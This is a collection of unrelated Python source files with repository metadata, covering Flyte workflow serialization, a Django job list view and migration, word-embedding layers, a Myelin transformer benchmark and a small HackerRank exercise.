lp_model = _launch_plan_models.LaunchPlan(
id=lp_id,
spec=lps,
closure=_launch_plan_models.LaunchPlanClosure(
state=None,
expected_inputs=interface_models.ParameterMap({}),
expected_outputs=interface_models.VariableMap({}),
),
)
return lp_model
def get_serializable_node(
entity_mapping: OrderedDict,
settings: SerializationSettings,
entity: Node,
) -> workflow_model.Node:
if entity.flyte_entity is None:
raise Exception(f"Node {entity.id} has no flyte entity")
upstream_sdk_nodes = [
get_serializable(entity_mapping, settings, n)
for n in entity.upstream_nodes
if n.id != _common_constants.GLOBAL_INPUT_NODE_ID
]
# Reference entities also inherit from the classes in the second if statement so address them first.
if isinstance(entity.flyte_entity, ReferenceEntity):
# This is a throw away call.
# See the comment in compile_into_workflow in python_function_task. This is just used to place a None value
# in the entity_mapping.
get_serializable(entity_mapping, settings, entity.flyte_entity)
ref = entity.flyte_entity
node_model = workflow_model.Node(
id=_dnsify(entity.id),
metadata=entity.metadata,
inputs=entity.bindings,
upstream_node_ids=[n.id for n in upstream_sdk_nodes],
output_aliases=[],
)
if ref.reference.resource_type == _identifier_model.ResourceType.TASK:
node_model._task_node = workflow_model.TaskNode(reference_id=ref.id)
elif ref.reference.resource_type == _identifier_model.ResourceType.WORKFLOW:
node_model._workflow_node = workflow_model.WorkflowNode(sub_workflow_ref=ref.id)
elif ref.reference.resource_type == _identifier_model.ResourceType.LAUNCH_PLAN:
node_model._workflow_node = workflow_model.WorkflowNode(launchplan_ref=ref.id)
else:
raise Exception(f"Unexpected reference type {ref}")
return node_model
if isinstance(entity.flyte_entity, PythonTask):
task_spec = get_serializable(entity_mapping, settings, entity.flyte_entity)
node_model = workflow_model.Node(
id=_dnsify(entity.id),
metadata=entity.metadata,
inputs=entity.bindings,
upstream_node_ids=[n.id for n in upstream_sdk_nodes],
output_aliases=[],
task_node=workflow_model.TaskNode(
reference_id=task_spec.template.id, overrides=TaskNodeOverrides(resources=entity._resources)
),
)
if entity._aliases:
node_model._output_aliases = entity._aliases
elif isinstance(entity.flyte_entity, WorkflowBase):
wf_spec = get_serializable(entity_mapping, settings, entity.flyte_entity)
node_model = workflow_model.Node(
id=_dnsify(entity.id),
metadata=entity.metadata,
inputs=entity.bindings,
upstream_node_ids=[n.id for n in upstream_sdk_nodes],
output_aliases=[],
workflow_node=workflow_model.WorkflowNode(sub_workflow_ref=wf_spec.template.id),
)
elif isinstance(entity.flyte_entity, BranchNode):
node_model = workflow_model.Node(
id=_dnsify(entity.id),
metadata=entity.metadata,
inputs=entity.bindings,
upstream_node_ids=[n.id for n in upstream_sdk_nodes],
output_aliases=[],
branch_node=get_serializable(entity_mapping, settings, entity.flyte_entity),
)
elif isinstance(entity.flyte_entity, LaunchPlan):
lp_spec = get_serializable(entity_mapping, settings, entity.flyte_entity)
node_model = workflow_model.Node(
id=_dnsify(entity.id),
metadata=entity.metadata,
inputs=entity.bindings,
upstream_node_ids=[n.id for n in upstream_sdk_nodes],
output_aliases=[],
workflow_node=workflow_model.WorkflowNode(launchplan_ref=lp_spec.id),
)
else:
raise Exception(f"Node contained non-serializable entity {entity._flyte_entity}")
return node_model
def get_serializable_branch_node(
entity_mapping: OrderedDict,
settings: SerializationSettings,
entity: FlyteLocalEntity,
) -> BranchNodeModel:
# We have to iterate through the blocks to convert the nodes from the internal Node type to the Node model type.
# This was done to avoid having to create our own IfElseBlock object (i.e. condition.py just uses the model
# directly) even though the node there is of the wrong type (our type instead of the model type).
    # TODO this should be cleaned up to avoid mutation; we probably should just create a new object
first = to_serializable_case(entity_mapping, settings, entity._ifelse_block.case)
other = to_serializable_cases(entity_mapping, settings, entity._ifelse_block.other)
else_node_model = None
if entity._ifelse_block.else_node:
else_node_model = get_serializable(entity_mapping, settings, entity._ifelse_block.else_node)
return BranchNodeModel(
if_else=_core_wf.IfElseBlock(
case=first, other=other, else_node=else_node_model, error=entity._ifelse_block.error
)
)
def get_serializable(
entity_mapping: OrderedDict,
settings: SerializationSettings,
entity: FlyteLocalEntity,
) -> FlyteControlPlaneEntity:
"""
The flytekit authoring code produces objects representing Flyte entities (tasks, workflows, etc.). In order to
register these, they need to be converted into objects that Flyte Admin understands (the IDL objects basically, but
this function currently translates to the layer above (e.g. SdkTask) - this will be changed to the IDL objects
directly in the future).
:param entity_mapping: This is an ordered dict that will be mutated in place. The reason this argument exists is
because there is a natural ordering to the entities at registration time. That is, underlying tasks have to be
registered before the workflows that use them. The recursive search done by this function and the functions
above form a natural topological sort, finding the dependent entities and adding them to this parameter before
the parent entity this function is called with.
:param settings: used to pick up project/domain/name - to be deprecated.
:param entity: The local flyte entity to try to convert (along with its dependencies)
:return: The resulting control plane entity, in addition to being added to the mutable entity_mapping parameter
is also returned.
"""
if entity in entity_mapping:
return entity_mapping[entity]
if isinstance(entity, ReferenceEntity):
# TODO: Create a non-registerable model class comparable to TaskSpec or WorkflowSpec to replace None as a
# keystone value. The purpose is only to store something so that we can check for it when compiling
# dynamic tasks. See comment in compile_into_workflow.
cp_entity = None
elif isinstance(entity, PythonTask):
cp_entity = get_serializable_task(entity_mapping, settings, entity)
elif isinstance(entity, WorkflowBase):
cp_entity = get_serializable_workflow(entity_mapping, settings, entity)
elif isinstance(entity, Node):
cp_entity = get_serializable_node(entity_mapping, settings, entity)
elif isinstance(entity, LaunchPlan):
cp_entity = get_serializable_launch_plan(entity_mapping, settings, entity)
elif isinstance(entity, BranchNode):
cp_entity = get_serializable_branch_node(entity_mapping, settings, entity)
else:
raise Exception(f"Non serializable type found {type(entity)} Entity {entity}")
# This needs to be at the bottom not the top - i.e. dependent tasks get added before the workflow containing it
entity_mapping[entity] = cp_entity
return cp_entity
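# Typical driver-side usage (sketch; `my_task` and `settings` stand in for
# a real task object and SerializationSettings instance):
#
#     entities = OrderedDict()
#     spec = get_serializable(entities, settings, my_task)
#     # `entities` now also contains every dependency, in registration order.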
| 41.962121 | 122 | 0.70795 |
2f538a5280c56f599990fe1448e3f1c2433341c4 | 274 | py | Python | jobs/views.py | aiventimptner/farafmb | b9ac1439698dae83d70cbfdc1e1c03146a967699 | ["MIT"] | 1 | 2017-04-06T09:12:45.000Z | 2017-04-06T09:12:45.000Z | jobs/views.py | aiventimptner/farafmb | b9ac1439698dae83d70cbfdc1e1c03146a967699 | ["MIT"] | 2 | 2017-09-07T22:09:50.000Z | 2020-06-09T14:46:30.000Z | jobs/views.py | aiventimptner/farafmb | b9ac1439698dae83d70cbfdc1e1c03146a967699 | ["MIT"] | null | null | null |
from django.shortcuts import render
from django.utils import timezone
from django.views import generic
from .models import Job
class JobList(generic.ListView):
model = Job
queryset = Job.objects.exclude(expired_on__lt=timezone.now())
ordering = '-created_on'
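# Wired into a URLconf along these lines (illustrative):
#     path('jobs/', JobList.as_view(), name='job-list')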
| 22.833333 | 65 | 0.766423 |
f5a6b93e88c5f69bb3c2ce5570e48a045ca0c456 | 8,305 | py | Python | elit/layers/embeddings/word2vec_tf.py | emorynlp/levi-graph-amr-parser | f71f1056c13181b8db31d6136451fb8d57114819 | ["Apache-2.0"] | 9 | 2021-07-12T22:05:47.000Z | 2022-02-22T03:10:14.000Z | elit/layers/embeddings/word2vec_tf.py | emorynlp/levi-graph-amr-parser | f71f1056c13181b8db31d6136451fb8d57114819 | ["Apache-2.0"] | 4 | 2021-08-31T08:28:37.000Z | 2022-03-28T05:52:14.000Z | elit/layers/embeddings/word2vec_tf.py | emorynlp/levi-graph-amr-parser | f71f1056c13181b8db31d6136451fb8d57114819 | ["Apache-2.0"] | null | null | null |
# -*- coding:utf-8 -*-
# Author: hankcs
# Date: 2019-08-24 21:49
import os
from typing import Tuple, Union, List
import numpy as np
import tensorflow as tf
from tensorflow.python.ops import math_ops
from elit.common.vocab_tf import VocabTF
from elit.utils.io_util import load_word2vec, get_resource
from elit.utils.tf_util import hanlp_register
from elit.common.util import DummyContext
class Word2VecEmbeddingV1(tf.keras.layers.Layer):
def __init__(self, path: str = None, vocab: VocabTF = None, normalize: bool = False, load_all=True, mask_zero=True,
trainable=False, name=None, dtype=None, dynamic=False, **kwargs):
super().__init__(trainable, name, dtype, dynamic, **kwargs)
if load_all and vocab and vocab.locked:
vocab.unlock()
self.vocab, self.array_np = self._load(path, vocab, normalize)
self.vocab.lock()
self.array_ks = tf.keras.layers.Embedding(input_dim=len(self.vocab), output_dim=self.dim, trainable=trainable,
embeddings_initializer=tf.keras.initializers.Constant(self.array_np),
mask_zero=mask_zero)
self.mask_zero = mask_zero
self.supports_masking = mask_zero
def compute_mask(self, inputs, mask=None):
if not self.mask_zero:
return None
return math_ops.not_equal(inputs, self.vocab.pad_idx)
def call(self, inputs, **kwargs):
return self.array_ks(inputs, **kwargs)
def compute_output_shape(self, input_shape):
return input_shape[0], self.dim
@staticmethod
def _load(path, vocab, normalize=False) -> Tuple[VocabTF, Union[np.ndarray, None]]:
if not vocab:
vocab = VocabTF()
if not path:
return vocab, None
assert vocab.unk_idx is not None
word2vec, dim = load_word2vec(path)
for word in word2vec:
vocab.get_idx(word)
pret_embs = np.zeros(shape=(len(vocab), dim), dtype=np.float32)
state = np.random.get_state()
np.random.seed(0)
bias = np.random.uniform(low=-0.001, high=0.001, size=dim).astype(dtype=np.float32)
scale = np.sqrt(3.0 / dim)
for word, idx in vocab.token_to_idx.items():
vec = word2vec.get(word, None)
if vec is None:
vec = word2vec.get(word.lower(), None)
# if vec is not None:
# vec += bias
if vec is None:
# vec = np.random.uniform(-scale, scale, [dim])
vec = np.zeros([dim], dtype=np.float32)
pret_embs[idx] = vec
# noinspection PyTypeChecker
np.random.set_state(state)
return vocab, pret_embs
@property
def size(self):
if self.array_np is not None:
return self.array_np.shape[0]
@property
def dim(self):
if self.array_np is not None:
return self.array_np.shape[1]
@property
def shape(self):
if self.array_np is None:
return None
return self.array_np.shape
def get_vector(self, word: str) -> np.ndarray:
assert self.array_np is not None
return self.array_np[self.vocab.get_idx_without_add(word)]
def __getitem__(self, word: Union[str, List, tf.Tensor]) -> np.ndarray:
if isinstance(word, str):
return self.get_vector(word)
elif isinstance(word, list):
vectors = np.zeros(shape=(len(word), self.dim))
for idx, token in enumerate(word):
vectors[idx] = self.get_vector(token)
return vectors
elif isinstance(word, tf.Tensor):
if word.dtype == tf.string:
                word_ids = self.vocab.token_to_idx_table.lookup(word)
                # `array_tf` is never defined on this class; look up in the
                # stored NumPy matrix instead (TF converts it to a tensor).
                return tf.nn.embedding_lookup(self.array_np, word_ids)
            elif word.dtype == tf.int32 or word.dtype == tf.int64:
                return tf.nn.embedding_lookup(self.array_np, word)
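    # Illustrative lookups (hypothetical embedding file and tokens):
    #
    #     emb = Word2VecEmbeddingV1('glove.6B.100d.txt')
    #     emb['cat']           # single vector, shape (100,)
    #     emb[['cat', 'dog']]  # stacked matrix, shape (2, 100)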
@hanlp_register
class Word2VecEmbeddingTF(tf.keras.layers.Embedding):
def __init__(self, filepath: str = None, vocab: VocabTF = None, expand_vocab=True, lowercase=True,
input_dim=None, output_dim=None, unk=None, normalize=False,
embeddings_initializer='VarianceScaling',
embeddings_regularizer=None,
activity_regularizer=None, embeddings_constraint=None, mask_zero=True, input_length=None,
name=None, cpu=True, **kwargs):
filepath = get_resource(filepath)
word2vec, _output_dim = load_word2vec(filepath)
if output_dim:
assert output_dim == _output_dim, f'output_dim = {output_dim} does not match {filepath}'
output_dim = _output_dim
# if the `unk` token exists in the pretrained,
# then replace it with a self-defined one, usually the one in word vocab
if unk and unk in word2vec:
word2vec[vocab.safe_unk_token] = word2vec.pop(unk)
if vocab is None:
vocab = VocabTF()
vocab.update(word2vec.keys())
if expand_vocab and vocab.mutable:
for word in word2vec:
vocab.get_idx(word.lower() if lowercase else word)
if input_dim:
assert input_dim == len(vocab), f'input_dim = {input_dim} does not match {filepath}'
input_dim = len(vocab)
# init matrix
self._embeddings_initializer = embeddings_initializer
embeddings_initializer = tf.keras.initializers.get(embeddings_initializer)
with tf.device('cpu:0') if cpu else DummyContext():
pret_embs = embeddings_initializer(shape=[input_dim, output_dim]).numpy()
# insert to pret_embs
for word, idx in vocab.token_to_idx.items():
vec = word2vec.get(word, None)
# Retry lower case
if vec is None and lowercase:
vec = word2vec.get(word.lower(), None)
if vec is not None:
pret_embs[idx] = vec
if normalize:
pret_embs /= np.std(pret_embs)
if not name:
name = os.path.splitext(os.path.basename(filepath))[0]
super().__init__(input_dim, output_dim, tf.keras.initializers.Constant(pret_embs), embeddings_regularizer,
activity_regularizer, embeddings_constraint, mask_zero, input_length, name=name, **kwargs)
self.filepath = filepath
self.expand_vocab = expand_vocab
self.lowercase = lowercase
def get_config(self):
config = {
'filepath': self.filepath,
'expand_vocab': self.expand_vocab,
'lowercase': self.lowercase,
}
base_config = super(Word2VecEmbeddingTF, self).get_config()
base_config['embeddings_initializer'] = self._embeddings_initializer
return dict(list(base_config.items()) + list(config.items()))
@hanlp_register
class StringWord2VecEmbeddingTF(Word2VecEmbeddingTF):
def __init__(self, filepath: str = None, vocab: VocabTF = None, expand_vocab=True, lowercase=False, input_dim=None,
output_dim=None, unk=None, normalize=False, embeddings_initializer='VarianceScaling',
embeddings_regularizer=None, activity_regularizer=None, embeddings_constraint=None, mask_zero=True,
input_length=None, name=None, **kwargs):
if vocab is None:
vocab = VocabTF()
self.vocab = vocab
super().__init__(filepath, vocab, expand_vocab, lowercase, input_dim, output_dim, unk, normalize,
embeddings_initializer, embeddings_regularizer, activity_regularizer, embeddings_constraint,
mask_zero, input_length, name, **kwargs)
def call(self, inputs):
assert inputs.dtype == tf.string, \
            f'Expected tf.string but got tf.{inputs.dtype.name}: {inputs}. ' \
            f'Please pass tf.string in.'
inputs = self.vocab.lookup(inputs)
# inputs._keras_mask = tf.not_equal(inputs, self.vocab.pad_idx)
return super().call(inputs)
def compute_mask(self, inputs, mask=None):
if not self.mask_zero:
return None
return tf.not_equal(inputs, self.vocab.pad_token)
| 42.15736 | 119 | 0.624925 |
d7819266695791964a62614eefc8322a5120926d | 6,683 | py | Python | src/loanforms/admin.py | Deepak27004/carecoop | 01229c1f9d1c89e595d7f4ca62a07e780522118b | ["MIT"] | null | null | null | src/loanforms/admin.py | Deepak27004/carecoop | 01229c1f9d1c89e595d7f4ca62a07e780522118b | ["MIT"] | null | null | null | src/loanforms/admin.py | Deepak27004/carecoop | 01229c1f9d1c89e595d7f4ca62a07e780522118b | ["MIT"] | 5 | 2017-11-06T14:15:19.000Z | 2020-10-02T14:51:37.000Z |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.contrib import admin
# from .models import (PersonalInformation, LoanApplication, LoanPaymentShareContribution, OutStandingLoans,
# Security, Declaration, ReviewedByCoOperativeManager,
# LoanAnalysisAndApprovalByLoans, NameSignatureDate)
# class PersonalInformationAdmin(admin.ModelAdmin):
# list_display = ['name','organisation','member_number','employee_number','email_address','telephone','physical_address',
# 'postal_address','length_of_membership','nrc_number']
# class Meta:
# model = PersonalInformation
# admin.site.register(PersonalInformation, PersonalInformationAdmin)
# class LoanApplicationAdmin(admin.ModelAdmin):
# list_display = ['amount_applied_for','amount_in_words','period_repayment','purposes_for_the_loan']
# class Meta:
# model = LoanApplication
# admin.site.register(LoanApplication, LoanApplicationAdmin)
# class LoanPaymentShareContributionAdmin(admin.ModelAdmin):
# list_display = ['period_of_repayment','monthly_principal_deduction','monthly_interest_deduction',
# 'monthly_share_contribution','total_care_coop_deduction']
# class Meta:
# model = LoanPaymentShareContribution
# admin.site.register(LoanPaymentShareContribution, LoanPaymentShareContributionAdmin)
# class OutStandingLoansAdmin(admin.ModelAdmin):
# list_display = ['premium_loan_amount','premium_balance','premium_monthly_repayment',
# 'ordinary_loan_amount','ordinary_balance','ordinary_monthly_repayment',
# 'rental_plus_loan_amount','rental_plus_balance','rental_plus_monthly_repayment',
# 'education_loan_amount','education_balance','education_monthly_repayment',
# 'emergency_loan_amount','emergency_balance','emergency_monthly_repayment',
# 'family_holiday_loan_amount','family_holiday_balance','family_holiday_monthly_repayment',
# 'commodity_loan_amount','commodity_balance','commodity_monthly_repayment',
# 'building_loan_amount','building_balance','building_monthly_repayment',
# 'land_purchase_loan_amount','land_purchase_balance','land_purchase_monthly_repayment',
# 'care_coop_land_loan_amount','care_coop_land_balance','care_coop_land_monthly_repayment',
# 'vehicle_loan_amount','vehicle_balance','vehicle_monthly_repayment',
# 'vehicle_insurance_loan_amount','vehicle_insurance_balance','vehicle_insurance_monthly_repayment',
# 'share_financing_loan_amount','share_financing_balance','share_financing_monthly_repayment',
# 'home_improvement_loan_amount','home_improvement_balance','home_improvement_monthly_repayment']
# class Meta:
# model = OutStandingLoans
# admin.site.register(OutStandingLoans, OutStandingLoansAdmin)
# class SecurityAdmin(admin.ModelAdmin):
# list_display = ['total_shares','terminal_benefits_accured','total','signaturea','signatureb','datea','dateb']
# class Meta:
# model = Security
# admin.site.register(Security, SecurityAdmin)
# class DeclarationAdmin(admin.ModelAdmin):
# list_display = ['applicant_name','datea','signature','dateb','bank_name','account_no',
# 'branch','cheque','bank_transfer']
# class Meta:
# model = Declaration
# admin.site.register(Declaration, DeclarationAdmin)
# class ReviewedByCoOperativeManagerAdmin(admin.ModelAdmin):
# list_display = ['name','date','signature']
# class Meta:
# model = ReviewedByCoOperativeManager
# admin.site.register(ReviewedByCoOperativeManager, ReviewedByCoOperativeManagerAdmin)
# class LoanAnalysisAndApprovalByLoansAdmin(admin.ModelAdmin):
# list_display = ['comments','chair_person_name','chair_person_signature','chair_person_date',
# 'Treasurer_name','Treasurer_signature','Treasurer_date',
# 'committee_member_name','committee_member_signature','committee_member_date']
# class Meta:
# model = LoanAnalysisAndApprovalByLoans
# admin.site.register(LoanAnalysisAndApprovalByLoans, LoanAnalysisAndApprovalByLoansAdmin)
# class NameSignatureDateAdmin(admin.ModelAdmin):
# list_display = ['name','signature','date']
# class Meta:
# model = NameSignatureDate
# admin.site.register(NameSignatureDate, NameSignatureDateAdmin)
# # class SuccessStoriesAdmin(admin.ModelAdmin):
# # list_display = ['message','name','carecoopnumber','','','','']
# # Register your models here.
# Register your models here.
| 36.519126 | 122 | 0.781984 |
27811d5c9f1561995664152fd1fa51cd0da8321f | 7,876 | py | Python | sling/myelin/tests/transformer.py | anysql/sling | d521b27f1537608ddf3d8b4281edd585ffd90545 | ["Apache-2.0"] | 97 | 2020-03-11T07:44:05.000Z | 2022-03-27T14:24:15.000Z | sling/myelin/tests/transformer.py | anysql/sling | d521b27f1537608ddf3d8b4281edd585ffd90545 | ["Apache-2.0"] | 11 | 2020-10-23T09:26:26.000Z | 2021-08-25T09:31:28.000Z | sling/myelin/tests/transformer.py | anysql/sling | d521b27f1537608ddf3d8b4281edd585ffd90545 | ["Apache-2.0"] | 8 | 2018-06-11T07:59:18.000Z | 2021-06-09T09:19:05.000Z |
"""Myelin flow definition for Transformer model."""
import numpy as np
import sling.myelin as myelin
import sling.myelin.simulator as simulator
import sling.flags as flags
flags.define('--repeat', default=1, type=int)
flags.define('--flow')
class TransformerLayer:
"""Builds a flow graph for single transformer layer."""
def __init__(self, f, hidden_size, filter_size, seq_length, num_heads):
self._f = f
self._hidden_size = hidden_size
self._filter_size = filter_size
self._seq_length = seq_length
self._num_heads = num_heads
self._depth = hidden_size // num_heads
def layer_norm(self, x, epsilon=1e-6):
f = self._f
scale = f.array('layer_norm_scale',
np.random.randn(self._hidden_size).astype(np.float32))
bias = f.array('layer_norm_bias',
np.random.randn(self._hidden_size).astype(np.float32))
# Computes: tf.reduce_mean(x, axis=[-1], keepdims=True)
mean = f.mean(x, axis=-1, keepdims=True)
# Computes: tf.reduce_mean(tf.square(x - mean), axis=[-1], keepdims=True)
variance = f.mean(f.square(f.sub(x, mean)), axis=-1, keepdims=True)
# Computes: (x - mean) * tf.rsqrt(variance + epsilon)
norm_x = f.mul(f.sub(x, mean),
f.div(1.0, f.sqrt(f.add(variance, epsilon))))
return f.add(f.mul(norm_x, scale), bias)
def self_attention_layer(self, x):
"""Computes self-attention."""
def _split_heads(x):
"""Split x into different heads, and transpose the resulting value.
      The tensor is transposed to ensure the inner dimensions hold the correct
values during the matrix multiplication.
Args:
x: A tensor with shape [seq_length, hidden_size]
Returns:
A tensor with shape [num_heads, seq_length, hidden_size/num_heads]
"""
f = self._f
x = f.reshape(x, [self._seq_length, self._num_heads, self._depth])
return f.transpose(x, [1, 0, 2])
def _combine_heads(x):
"""Combine tensor that has been split.
Args:
x: A tensor [num_heads, length, hidden_size/num_heads]
Returns:
A tensor with shape [length, hidden_size]
"""
x = f.transpose(x, [1, 0, 2]) # --> [length, num_heads, depth]
return f.reshape(x, [self._seq_length, self._hidden_size])
f = self._f
q_dense_layer = f.array(
'q', np.random.randn(
self._hidden_size, self._hidden_size).astype(np.float32))
k_dense_layer = f.array(
'k', np.random.randn(
self._hidden_size, self._hidden_size).astype(np.float32))
v_dense_layer = f.array(
'v', np.random.randn(
self._hidden_size, self._hidden_size).astype(np.float32))
output_dense_layer = f.array(
'o', np.random.randn(
self._hidden_size, self._hidden_size).astype(np.float32))
# Linearly project the query (q), key (k) and value (v) using different
# learned projections. This is in preparation of splitting them into
# multiple heads. Multi-head attention uses multiple queries, keys, and
# values rather than regular attention (which uses a single q, k, v).
# Output: [seq_length, hidden_size].
q = f.matmul(x, q_dense_layer)
k = f.matmul(x, k_dense_layer)
v = f.matmul(x, v_dense_layer)
# Split q, k, v into heads.
# Output: [num_heads, seq_length, depth].
q = _split_heads(q)
k = _split_heads(k)
v = _split_heads(v)
q = f.mul(q, self._depth ** -0.5)
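    # Scale queries by 1/sqrt(depth) (scaled dot-product attention) so the
    # logits' variance stays roughly independent of the per-head dimension.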
# Eq: logits = tf.matmul(q, k, transpose_b=True)
# Logits is supposed to be [num_heads, seq_length, seq_length]
k = f.transpose(k, [0, 2, 1])
logits = f.matmul(q, k) # batched matmul
# We won't need bias if we work with batch_size = 1
# logits = f.add(logits, bias)
weights = f.softmax(logits, name='attention_weights')
# Output: [num_heads, seq_length, depth]
attention_output = f.matmul(weights, v) # batched matmul
# Output: [seq_length, hidden_dim]
attention_output = _combine_heads(attention_output)
# Do linear projection.
# Output: [seq_length, hidden_dim]
attention_output = f.matmul(attention_output, output_dense_layer)
return attention_output
def postprocess_wrapper(self, layer_input, layer):
# LayerNorm.
layer_input_norm = self.layer_norm(layer_input)
# Self-attention.
attention_output = layer(layer_input_norm)
# Skip-connection.
output = self._f.add(attention_output, layer_input)
return output
def feed_forward_layer(self, x):
"""Computes feed-forward Transformer layer.
First transforms the input to filter_size and then down-scales to
hidden_dim.
"""
f = self._f
def _ff(x, input_dim, output_dim):
w = f.array('w',
np.random.randn(input_dim, output_dim).astype(np.float32))
b = f.array('b', np.random.randn(output_dim).astype(np.float32))
return f.add(f.matmul(x, w), b)
# Output: [seq_length, filter_size]
filter_output = f.relu(_ff(x, self._hidden_size, self._filter_size))
# Output: [seq_length, hidden_size]
# was: output = _ff(filter_output, self._hidden_size, self._hidden_size)
output = _ff(filter_output, self._filter_size, self._hidden_size)
return output
def build_flow(self, layer_input):
# Self-attention + LayerNorm+Skip.
# Output: [seq_length, hidden_dim]
self_attn_output = self.postprocess_wrapper(layer_input,
self.self_attention_layer)
# Feed-forward + LayerNorm+Skip.
# Output: [seq_length, hidden_dim]
ff_output = self.postprocess_wrapper(self_attn_output,
self.feed_forward_layer)
# LayerNorm+Skip.
final_output = self.layer_norm(ff_output)
return final_output
flags.parse()
flow = myelin.Flow()
f = myelin.Builder(flow, 'f')
seq_length = 128
hidden_size = 256
num_layers = 3
num_heads = 8
filter_size = hidden_size * 4
vocab_size = 32000
num_segment_ids = 5
input_ids = f.var('input_ids', myelin.DT_INT32, [seq_length])
segment_ids = f.var('segment_ids', myelin.DT_INT32, [seq_length])
wpe_embedding = f.array(
'wpe_embedding',
np.random.randn(vocab_size, hidden_size).astype(np.float32))
segment_embeddings = f.array(
'segment_embeddings',
np.random.randn(num_segment_ids, hidden_size).astype(np.float32))
positional_embeddings = f.array(
'positional_embeddings',
np.random.randn(seq_length, hidden_size).astype(np.float32))
input_ids_emb = f.gather(wpe_embedding, input_ids)
input_segment_ids_emb = f.gather(segment_embeddings, segment_ids)
# Output: [seq_length, hidden_size]
layer_input = f.add(input_ids_emb,
f.add(input_segment_ids_emb, positional_embeddings))
for _ in range(num_layers):
transformer = TransformerLayer(
f, hidden_size, filter_size, seq_length, num_heads)
layer_output = transformer.build_flow(layer_input)
layer_input = layer_output
f.rename(layer_output, 'output')
if flags.arg.flow:
flow.save(flags.arg.flow)
# Compile flow to network.
compiler = myelin.Compiler()
net = compiler.compile(flow)
cell = net.cell(f.func.name)
data = cell.instance()
baseline = simulator.compute(flow, f.func, data)
# Profile network.
print('Testing transformer layers:', num_layers, 'length:', seq_length,
'hidden:', hidden_size, 'filter:', filter_size, 'heads:', num_heads)
for n in range(flags.arg.repeat):
data.clear()
data.compute()
if flags.arg.profile:
print(net.profile())
# Compare output of network to NumPy baseline.
baseline_output = baseline[layer_output]
test_output = np.array(data[layer_output])
if np.allclose(baseline_output, test_output, atol=1e-4):
print("Baseline comparison: SUCCESS")
else:
print("Baseline comparison: FAIL")
  print("baseline:")
  print(baseline_output)
  print("test:")
  print(test_output)
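# Illustrative usage (not part of the original script; values are examples):
#   python3 transformer.py --repeat=10 --flow=/tmp/transformer.flow
# Note: --profile is assumed to be registered elsewhere by sling's flags
# machinery; it is not defined in this file.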
| 31.630522 | 78 | 0.677628 |
67dfd815d056f597c992ac967d7c352183f84b92 | 3,963 | py | Python | api/migrations/0111_externalpartner_externalpartnercategory_fieldreportexternalpartner_fieldreportexternalpartnercategor.py | IFRCGo/ifrcgo-api | c1c3e0cf1076ab48d03db6aaf7a00f8485ca9e1a | ["MIT"] | 11 | 2018-06-11T06:05:12.000Z | 2022-03-25T09:31:44.000Z | api/migrations/0111_externalpartner_externalpartnercategory_fieldreportexternalpartner_fieldreportexternalpartnercategor.py | IFRCGo/ifrcgo-api | c1c3e0cf1076ab48d03db6aaf7a00f8485ca9e1a | ["MIT"] | 498 | 2017-11-07T21:20:13.000Z | 2022-03-31T14:37:18.000Z | api/migrations/0111_externalpartner_externalpartnercategory_fieldreportexternalpartner_fieldreportexternalpartnercategor.py | IFRCGo/ifrcgo-api | c1c3e0cf1076ab48d03db6aaf7a00f8485ca9e1a | ["MIT"] | 6 | 2018-04-11T13:29:50.000Z | 2020-07-16T16:52:11.000Z |
# Generated by Django 2.2.13 on 2021-02-02 18:11
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('api', '0110_auto_20210202_0950'),
]
operations = [
migrations.CreateModel(
name='ExternalPartner',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=200, verbose_name='name')),
],
options={
'verbose_name': 'external partner',
'verbose_name_plural': 'external partners',
},
),
migrations.CreateModel(
name='ExternalPartnerCategory',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=200, verbose_name='name')),
],
options={
'verbose_name': 'external partner category',
'verbose_name_plural': 'external partner caregories',
},
),
migrations.CreateModel(
name='SupportedActivity',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=200, verbose_name='name')),
],
options={
'verbose_name': 'supported activity',
'verbose_name_plural': 'supported activities',
},
),
migrations.CreateModel(
name='FieldReportSupportedActivity',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('field_report', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='supportedactivities', to='api.FieldReport', verbose_name='field report')),
('supported_activities', models.ManyToManyField(blank=True, to='api.SupportedActivity', verbose_name='supported activities')),
],
options={
'verbose_name': 'field report supported activities',
'verbose_name_plural': 'field report supported activities',
},
),
migrations.CreateModel(
name='FieldReportExternalPartnerCategory',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('external_partner_categories', models.ManyToManyField(blank=True, to='api.ExternalPartnerCategory', verbose_name='external partner categories')),
('field_report', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='externalpartnercategories', to='api.FieldReport', verbose_name='field report')),
],
options={
'verbose_name': 'field report external partner categories',
'verbose_name_plural': 'field report external partner categories',
},
),
migrations.CreateModel(
name='FieldReportExternalPartner',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('external_partners', models.ManyToManyField(blank=True, to='api.ExternalPartner', verbose_name='external partners')),
('field_report', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='externalpartners', to='api.FieldReport', verbose_name='field report')),
],
options={
'verbose_name': 'field report external partners',
'verbose_name_plural': 'field report external partners',
},
),
]
| 47.178571 | 190 | 0.597275 |
e6b3ca041aac71420aebd0db0fc4f030fcc371c2 | 327 | py | Python | 30 Days of Code/day26_nested_logic.py | quqixun/Hackerrank_Python | 024084a5a77878ce2b4b99d731be28b221f58e41 | ["MIT"] | 1 | 2018-11-12T01:48:22.000Z | 2018-11-12T01:48:22.000Z | Algorithm/Implementation/library_fine.py | quqixun/Hackerrank_Python | 024084a5a77878ce2b4b99d731be28b221f58e41 | ["MIT"] | null | null | null | Algorithm/Implementation/library_fine.py | quqixun/Hackerrank_Python | 024084a5a77878ce2b4b99d731be28b221f58e41 | ["MIT"] | null | null | null |
#!/bin/python3
import sys
ad, am, ay = map(int, input().strip().split(" "))
ed, em, ey = map(int, input().strip().split(" "))
hackos = 0
if ay == ey:
if am == em:
if ad > ed:
hackos = 15 * (ad - ed)
elif am > em:
hackos = 500 * (am - em)
elif ay > ey:
hackos = 10000
print(hackos)
| 15.571429 | 49 | 0.492355 |
